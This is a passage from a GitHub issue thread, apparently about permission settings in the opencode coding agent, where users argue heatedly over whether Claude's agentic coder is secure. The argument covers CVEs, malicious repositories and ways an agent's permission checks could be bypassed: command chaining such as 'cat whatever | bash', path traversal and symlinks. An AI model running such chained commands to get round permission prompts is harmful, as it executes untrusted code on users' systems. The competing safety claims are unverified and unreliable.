Yes, i have read and i do understand the CVE's, but you once again you chose to ignore what's said and try to use strawman argumentation to get around what i said. The point i was making with CVE's was not that all those issues still existed but that you have a bunch of unrelated critical issues popping up over and over, and if you think about security in the design of something this is highly unlikely to happen.
Even the Claude github talks about these issues. Go see the timeline of how quickly these things gets fixed after being reported.
I'm not making strawman arguments as i do know what i'm taking about, you claiming i do is just hilarious. Maybe you need to look up what strawman argumentation actually is. Making a direct point of how something can be abused is not strawman argumentation.
Perhaps you should go read the book "Chained Exploits", but i suspect those concepts will be lost on you too.
You don't know what you are talking about and you think Claude is secure when it's track-record show huge issues that go back just 1-2 months.
This is why i say. All agentic coders have these issues and should only be executed in a container with minimal access to the rest of your system.
@rgaufman commented on GitHub (Dec 16, 2025):
Sure. Your message seems to address someone else's arguments, not mine. Read my response again.
@DragonDev1906 commented on GitHub (Dec 17, 2025):
First of all, why are you two fighting? You seem to want the same thing.
All AI agents that are used for writing code that will be executed have this issue (source code edit + execute). But terminal applications like opencode are not JUST used for writing code. The following cases do not need code execution, benefit from good permissions and secure defaults and would not need to be sandboxed:
All of these benefit form being
bash = "ask"being the default and it would be really useful to restrict file reads and writes based on the file extension, for example to only allow editing markdown files. Ideally these could be different based on which directory you are working in.@rgaufman commented on GitHub (Dec 17, 2025):
Exactly and well summarised. I don't know who he imaged he was responding to, maybe it's a hallucinating AI bot as it made no sense ;)
@pakar commented on GitHub (Dec 17, 2025):
@DragonDev1906 It started with that, but he kept insisting that Claude is secure and "take security so seriously" even with proof of the opposite. Making the claims he does is quite dangerous as that may cause others to be lulled into false sense of security.
He also has a habit of making large edits on his posts after getting a reply.
@rgaufman commented on GitHub (Dec 17, 2025):
Don't misrepresent what I said please. I said Claude's defaults are secure enough, they make it more and more secure with every release.
No system is ever 100% secure, it's a complete straw man to say:
And then claim see? Claude has the same problems, it doesn't. It's safe by default unless you explicitly make it unsafe.
You also made a bunch of false claims about command chaining and symlink reading.
But even in each of these examples, the Claude team add more safeguards instead of saying that "it's by design".
Large edits? I clarified a few small points, I didn't see you replied.
@pakar commented on GitHub (Dec 17, 2025):
@rgaufman
I have not misrepresented what you said. The "take security so seriously" is a direct quote from you regarding claude.
You on the other hand have said i'm making strawman arguments, making false claims and and is hallucinating in my replies, replies i wrote before you made edits.
I have not made any false claims. Everything i have stated i have given you references for. If you are too ignorant to even read and understand those i cannot help you.
I would not call your edits small as some of them changed the complete meaning of what you where saying.
I'm not gonna give you any more time because you are just full of it.
@rgaufman commented on GitHub (Dec 17, 2025):
Give the context, they take security so seriously that they add safeguards even when running inside of malicious repositories you explicitly marked as trusted and explicitly allowed code execution in.
It would be so trivial for you to prove me wrong, just give me a prompt to run and let's see if I get prompted by Claude and Roo Code or not. All the prompt examples you gave do not execute, you are ignorant, or lying, or paranoid - or all 3.
They are not building a tool like checkinstall, that is meant to catch and audit everything make install is doing, that's just a totally different product. I'm completely against the suggestions you made and the conclusions you drawn when it comes to security, they are paranoid delusions and not how the vast majority of users use agentic coders.
You absolutely made a whole bunch of false claims. I keep calling you out on them and you refuse to provide any reproducible prompt (for the current or any past version for that matter). Give me a prompt, that will do what you claim, in my own code base - I'll wait...
Every reference you provided, including the "severe" ones, require multiple steps by the user to explicitly allow, some times as many as 5 steps. I keep repeating this critical point, you keep pretending I never said it. And even those examples which require overriding all defaults and lying to Claude, they've added safeguards against - which they didn't have to do. Those are situations where I wouldn't actually be against them saying, sorry, that's a design decision - we prompted you, it's on you.
Please try to read carefully and understand. You'll be able to get rid of your VMs and have a much better experience with agentic coders:
Chaining: Just because you whitelisted cat (which is NOT the default), doesn't mean that "cat whatever | bash" will be permitted or even "cat whatever >path", unless you also whitelist bash and whitelist the path. If you're worried about this, disable execution of commands (which is the default), it's perfectly safe to run out of the box as nothing will execute. Are there tools other than OpenCode on the Internet that have/had a chaining problem? - I'm sure there are, that's a strawman.
Individual Commands: Even simple things like if you always allow "biome lint", it will prompt again for "biome anything". Not only are you required to allow the command, it will prompt for new kinds of arguments. But if you're going to let it execute anything, make sure you understand what it is. If you're going to allow all, then sure, do it in a VM or have a backup of your system in the unlikely situation it ends up bricking it. But you are in control, none of this happens without you explicitly allowing it/
Paths: No, if you pass ../anything or /anything, to any command, either directly or in the chain, it immediately prompts.
Symlinks: No, it won't read symlinks outside of the repo without explicit permissions. And now it won't even read symlinks INSIDE of your repo, if they happen to point anywhere outside of it, you have to explicitly allow it.
Executing: No, it won't execute anything unless explicitly permitted.
Trusting Repositories: No, it will not trust any code base unless YOU explicitly tell it to.
You want to run a VM for every VS code and Claude process? - you go right ahead, waste your time. Others will read my comment and laugh, seeing how ridiculous your arguments are, impossible to reproduce, and require hypotheticals like: "what if you download a virus and trust the repo and allow execution? OMG!"
Another one of those easy to prove, show me an edit that "changed the complete meaning".
@pakar commented on GitHub (Dec 18, 2025):
Stop lying making false statements about me. You have no clue about what you are talking about. Accusing me of lying and making false statements is ridiculous.
@mnaser commented on GitHub (Dec 19, 2025):
@thdxr @adamdotdevin @rekram1-node @fwang
sorry for the ping, but the discussion above is getting out of control and it's no longer covering any updates about when this feature will arrive, probably worth locking.